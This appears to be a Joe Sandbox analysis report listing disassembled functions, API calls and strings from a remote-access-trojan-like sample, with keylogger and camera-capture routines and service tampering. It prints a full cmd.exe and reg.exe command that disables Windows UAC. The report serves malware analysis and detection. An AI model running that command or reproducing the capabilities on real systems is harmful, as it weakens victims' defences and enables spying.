                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __allrem.LIBCMT ref: 0043ABA9
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ABC5
                                                                                                • __allrem.LIBCMT ref: 0043ABDC
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ABFA
                                                                                                • __allrem.LIBCMT ref: 0043AC11
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC2F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                • String ID:
                                                                                                • API String ID: 1992179935-0
                                                                                                • Opcode ID: ab469b58df769677e88436e296b01d902216950b9c6cf3364f1c10046dae446c
                                                                                                • Instruction ID: 0494a107bc7118a0c65ff638fd2ae5d498b9f40573f82e97bb56a75a26127c98
                                                                                                • Opcode Fuzzy Hash: ab469b58df769677e88436e296b01d902216950b9c6cf3364f1c10046dae446c
                                                                                                • Instruction Fuzzy Hash: 89815C72A407066BE720EE7ACC81B6B73A99F48324F14612FF551D6381E77CDD108B5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004028A4: std::_Xinvalid_argument.LIBCPMT ref: 004028A9
                                                                                                • Sleep.KERNEL32(00000000,0040D1B0), ref: 004044C4
                                                                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prologSleepXinvalid_argumentstd::_
                                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                • API String ID: 834325642-3054508432
                                                                                                • Opcode ID: 4fa59adb23da4f9c83bb833969745be3854f348026a415c7aa23237aeae12d11
                                                                                                • Instruction ID: 399280f60de85e060329c6f4ab31165944f92565a6c4adf25c6d9c2547c5904d
                                                                                                • Opcode Fuzzy Hash: 4fa59adb23da4f9c83bb833969745be3854f348026a415c7aa23237aeae12d11
                                                                                                • Instruction Fuzzy Hash: 2351E1B1A042106BCA14BB769D0AA6E3755ABC0748F00053FFA06677E2DF7C8E45839E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004116EA: SetLastError.KERNEL32(0000000D,00411C6A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411C48), ref: 004116F0
                                                                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411C48), ref: 00411C85
                                                                                                • GetNativeSystemInfo.KERNEL32(?,0040D1F0,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411C48), ref: 00411CF3
                                                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411D17
                                                                                                  • Part of subcall function 00411BF1: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411D35,?,00000000,00003000,00000040,00000000,?,?), ref: 00411C01
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411D5E
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411D65
                                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411E78
                                                                                                  • Part of subcall function 00411FC5: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411E85,?,?,?,?,?), ref: 00412035
                                                                                                  • Part of subcall function 00411FC5: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0041203C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 3950776272-0
                                                                                                • Opcode ID: 2d5080cdee88ae4489b0304f1850a20b2adfe15f654517403e01e164c907dd0f
                                                                                                • Instruction ID: aa09dbe93b48559441b8e69703723e77616d2dc90e2c663cf43076ad7bdcd395
                                                                                                • Opcode Fuzzy Hash: 2d5080cdee88ae4489b0304f1850a20b2adfe15f654517403e01e164c907dd0f
                                                                                                • Instruction Fuzzy Hash: 9E61CF70641311ABD7109F66C981BAB7BA5BF44740F04412AFF058B2A2EB7CE8D1CBD9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID:
                                                                                                • API String ID: 4189289331-0
                                                                                                • Opcode ID: 9cc9e2441c9805497d6c6d45b19e56c861359f6979edbe3d494d5417b91ff5fb
                                                                                                • Instruction ID: 61f1245a5bdd02f6de00c1f3f020f63fedb85c0006fd73e81189f4daecab80f4
                                                                                                • Opcode Fuzzy Hash: 9cc9e2441c9805497d6c6d45b19e56c861359f6979edbe3d494d5417b91ff5fb
                                                                                                • Instruction Fuzzy Hash: 69510B72904A05ABFF20AB598C41BAF77A8DF49334F20421FF815A6293DF3DD910866C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16_free
                                                                                                • String ID: a/p$am/pm
                                                                                                • API String ID: 2936374016-3206640213
                                                                                                • Opcode ID: 1b4becbc2c62a6ae7dce0a193be4bff326977229060301aef8006510559cc272
                                                                                                • Instruction ID: 932c9bd22f8cf0e2033f9da72f7f035ab39ca9aaf1c56182f74d334176be82e0
                                                                                                • Opcode Fuzzy Hash: 1b4becbc2c62a6ae7dce0a193be4bff326977229060301aef8006510559cc272
                                                                                                • Instruction Fuzzy Hash: 4FD1F631908206DAFB28AF68C899BBBBBB1EF05310F24415BE5059B751D33D9D43CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410DBC
                                                                                                • int.LIBCPMT ref: 00410DCF
                                                                                                  • Part of subcall function 0040E00F: std::_Lockit::_Lockit.LIBCPMT ref: 0040E020
                                                                                                  • Part of subcall function 0040E00F: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E03A
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00410E0F
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410E18
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410E36
                                                                                                • __Init_thread_footer.LIBCMT ref: 00410E77
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3815856325-0
                                                                                                • Opcode ID: 8a1c56814aaffb39b6a738752dfce106633844222024accdf427d11f3e27a8d3
                                                                                                • Instruction ID: 387eaa89caa8dd4f8259d30b56db7845ab8ba92959ee530e51d282b7c15fb7ee
                                                                                                • Opcode Fuzzy Hash: 8a1c56814aaffb39b6a738752dfce106633844222024accdf427d11f3e27a8d3
                                                                                                • Instruction Fuzzy Hash: 34210432A00924ABC714EB6AD9459DE73A8AF49324F20046FF405A72D1DF78AD81CBDD
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A2DC,00000000), ref: 0041ABD6
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A2DC,00000000), ref: 0041ABEA
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A2DC,00000000), ref: 0041ABF7
                                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A2DC,00000000), ref: 0041AC2C
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A2DC,00000000), ref: 0041AC3E
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A2DC,00000000), ref: 0041AC41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                • String ID:
                                                                                                • API String ID: 493672254-0
                                                                                                • Opcode ID: 8ab29b6f8dfadc739c1cfd945ac31cc587d16b71351be81549c8dfaccb54f5d1
                                                                                                • Instruction ID: bf0d9854aa1a1070f110eb920e3bd2440040cbff4b43ec2429cf537062a598c5
                                                                                                • Opcode Fuzzy Hash: 8ab29b6f8dfadc739c1cfd945ac31cc587d16b71351be81549c8dfaccb54f5d1
                                                                                                • Instruction Fuzzy Hash: 69014E71149215BBD6111B345C0DEFB3B5CDB41771F100317F715921D2EB68CD8195EA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,00CC372B,00CC3599,00CC2CB5), ref: 00CC3742
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CC3750
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC3769
                                                                                                • SetLastError.KERNEL32(00000000,00CC372B,00CC3599,00CC2CB5), ref: 00CC37BB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: e372c7272e9813478823a2fcbe7fcbd9e04e7a476bee46ad2cd154d79b735856
                                                                                                • Instruction ID: dc8aa67b92e72b64679542a0f475a74fdcda9298dc4fdd92ca2881420000e503
                                                                                                • Opcode Fuzzy Hash: e372c7272e9813478823a2fcbe7fcbd9e04e7a476bee46ad2cd154d79b735856
                                                                                                • Instruction Fuzzy Hash: 2F01B1B2609792AFE6142675FDDAF5B27A8EB06774720822EF424890F2EE116F006344
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
                                                                                                • _free.LIBCMT ref: 0044810C
                                                                                                • _free.LIBCMT ref: 00448134
                                                                                                • SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 00448141
                                                                                                • SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
                                                                                                • _abort.LIBCMT ref: 00448153
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 3160817290-0
                                                                                                • Opcode ID: 72d9dfed2c612fb7fc40968e50d96285ced74183b045fe3906e70e8c12316b41
                                                                                                • Instruction ID: 2456814f90d1a1756791b48dfe751582bdc8db7375cfa681c61f896b21bc20b7
                                                                                                • Opcode Fuzzy Hash: 72d9dfed2c612fb7fc40968e50d96285ced74183b045fe3906e70e8c12316b41
                                                                                                • Instruction Fuzzy Hash: E2F0A43510470067F612772A6C0BB6F25198BC3B66F36052FF918962A3EE6CCC43816D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA03
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA17
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA24
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA33
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA45
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA48
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: 60a7cbc30b89eb0f69decf0df0d6681b0d9bff21bb3b6cb3c15fbc2f13efb0a9
                                                                                                • Instruction ID: f73aa30613e04d16d5c4f291a78da36d4cb0244c6024500b3a5cad33c6a737a3
                                                                                                • Opcode Fuzzy Hash: 60a7cbc30b89eb0f69decf0df0d6681b0d9bff21bb3b6cb3c15fbc2f13efb0a9
                                                                                                • Instruction Fuzzy Hash: 7AF0C231501218ABD611AF659C49DFF3B6CDF45BA6F000026FE0992192DB68CD4595A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB07
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB1B
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB28
                                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB37
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB49
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB4C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: b8efc3080a58efbd5eeef1a2aefda9b54f9d6a5126152bd72706fcf9128d32df
                                                                                                • Instruction ID: 37910627c879923e7165713963b3d859e7cdae02db8f746732cc22f85bec5969
                                                                                                • Opcode Fuzzy Hash: b8efc3080a58efbd5eeef1a2aefda9b54f9d6a5126152bd72706fcf9128d32df
                                                                                                • Instruction Fuzzy Hash: 62F02231501228ABD2106F249C49EFF3B6CDF40B62F00002AFF0992182DB38DD0596A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A471,00000000), ref: 0041AB6E
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A471,00000000), ref: 0041AB82
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A471,00000000), ref: 0041AB8F
                                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A471,00000000), ref: 0041AB9E
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A471,00000000), ref: 0041ABB0
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A471,00000000), ref: 0041ABB3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: 6b308d3d3828d04a5c81abbbdd3fc3d303577ed345ddfa8b1085d6bdbe930796
                                                                                                • Instruction ID: b039222477f72e669e19058168d6a4c5c9cd5d8c05413f4857ae13130e95784f
                                                                                                • Opcode Fuzzy Hash: 6b308d3d3828d04a5c81abbbdd3fc3d303577ed345ddfa8b1085d6bdbe930796
                                                                                                • Instruction Fuzzy Hash: D5F02231501218ABD211AB24AC49EFF3B6CDB40B62F00006AFF0992182DB38CE4595A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _wcsrchr
                                                                                                • String ID: .bat$.cmd$.com$.exe
                                                                                                • API String ID: 1752292252-4019086052
                                                                                                • Opcode ID: 3ea52b52af2fb832731994d779af175946012ae03212f76866b1c507b6647f2b
                                                                                                • Instruction ID: 86941417921903d24e2c735264c716ba234c8beb55cd261c2ca8a4969ff0fc96
                                                                                                • Opcode Fuzzy Hash: 3ea52b52af2fb832731994d779af175946012ae03212f76866b1c507b6647f2b
                                                                                                • Instruction Fuzzy Hash: 7501267B614E15652624606DEC02F3F57988B91BB8726002FF968F73C2EE94FE8251D4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
                                                                                                  • Part of subcall function 0040B0B2: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B0C0
                                                                                                  • Part of subcall function 0040B0B2: wsprintfW.USER32 ref: 0040B141
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                                • String ID: Offline Keylogger Started$C}w
                                                                                                • API String ID: 465354869-1031753189
                                                                                                • Opcode ID: a92a7245fc8532d59aa84b5883882662c065ce5b50117d38b88f60bd46131d26
                                                                                                • Instruction ID: 95025eaa149aa7af44262cf4db9397527febe2deab88762ca52139077396e222
                                                                                                • Opcode Fuzzy Hash: a92a7245fc8532d59aa84b5883882662c065ce5b50117d38b88f60bd46131d26
                                                                                                • Instruction Fuzzy Hash: C91194B11003187AD220B7369C86CBF765CDE8139CB40057FF546225D2EA795D54CAFB
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 0-2084034818
                                                                                                • Opcode ID: 1d0df2327155258298668801caec56fa60931636a43f378b7c0f2a86dbe86275
                                                                                                • Instruction ID: cdda17936324947e2bd70ff6501ccbe15f467590b053c277106c794572e69b87
                                                                                                • Opcode Fuzzy Hash: 1d0df2327155258298668801caec56fa60931636a43f378b7c0f2a86dbe86275
                                                                                                • Instruction Fuzzy Hash: D511C831A01665FBCB229BE5FC44F1E7758AF05760B158159ECA7A72D0D730EF10A6E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B0C0
                                                                                                • wsprintfW.USER32 ref: 0040B141
                                                                                                  • Part of subcall function 0040A584: SetEvent.KERNEL32(?,?,00000000,0040B158,00000000), ref: 0040A5B0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventLocalTimewsprintf
                                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                • API String ID: 1497725170-248792730
                                                                                                • Opcode ID: e4fd3f9501e25fe09fb24f2c8d8c06fa50d8110225f551a97fd0a2fd84cf2f10
                                                                                                • Instruction ID: 1568c5d8c207f630130e9b3f2560adb69d65205e544b8c09f3532fcdf01993a8
                                                                                                • Opcode Fuzzy Hash: e4fd3f9501e25fe09fb24f2c8d8c06fa50d8110225f551a97fd0a2fd84cf2f10
                                                                                                • Instruction Fuzzy Hash: 7F118172504118AACB19BB96EC568FE77BCEE48315B00012FF506A20D2FF7C9E45C6AD
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A69B), ref: 0040A5F9
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A69B), ref: 0040A608
                                                                                                • Sleep.KERNEL32(00002710,?,?,?,0040A69B), ref: 0040A635
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,0040A69B), ref: 0040A63C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                                • String ID: XQG
                                                                                                • API String ID: 1958988193-3606453820
                                                                                                • Opcode ID: 1520c80fb292d9c5a298b7d16773fabdd74de63c5e2eb41e260ec47767b1fea6
                                                                                                • Instruction ID: 3707d938aca408b7ae5a758f45b809843a01d1a20cbb3131bb2780466404e056
                                                                                                • Opcode Fuzzy Hash: 1520c80fb292d9c5a298b7d16773fabdd74de63c5e2eb41e260ec47767b1fea6
                                                                                                • Instruction Fuzzy Hash: 5A11EB30640740AAE6316B249899B1F3A69EB45316F48093AF1C26A6D2C67A5CA5C72E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                • String ID: 0$MsgWindowClass
                                                                                                • API String ID: 2877667751-2410386613
                                                                                                • Opcode ID: 74b65070635049ec2d26739a327afccf73436923b15f71c562a2fffb27c52056
                                                                                                • Instruction ID: a4d69617be618aa425c15b7907214d431a9aa1418f7ef19932ca55fe49f400dc
                                                                                                • Opcode Fuzzy Hash: 74b65070635049ec2d26739a327afccf73436923b15f71c562a2fffb27c52056
                                                                                                • Instruction Fuzzy Hash: 1701E5B1D0021DBBDB00DFA5ECC49EFBBBCFA05355F40452AF915A6240E77999058BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                                                                • CloseHandle.KERNEL32(?), ref: 004077AA
                                                                                                • CloseHandle.KERNEL32(?), ref: 004077AF
                                                                                                Strings
                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                                                                Memory Dump Source
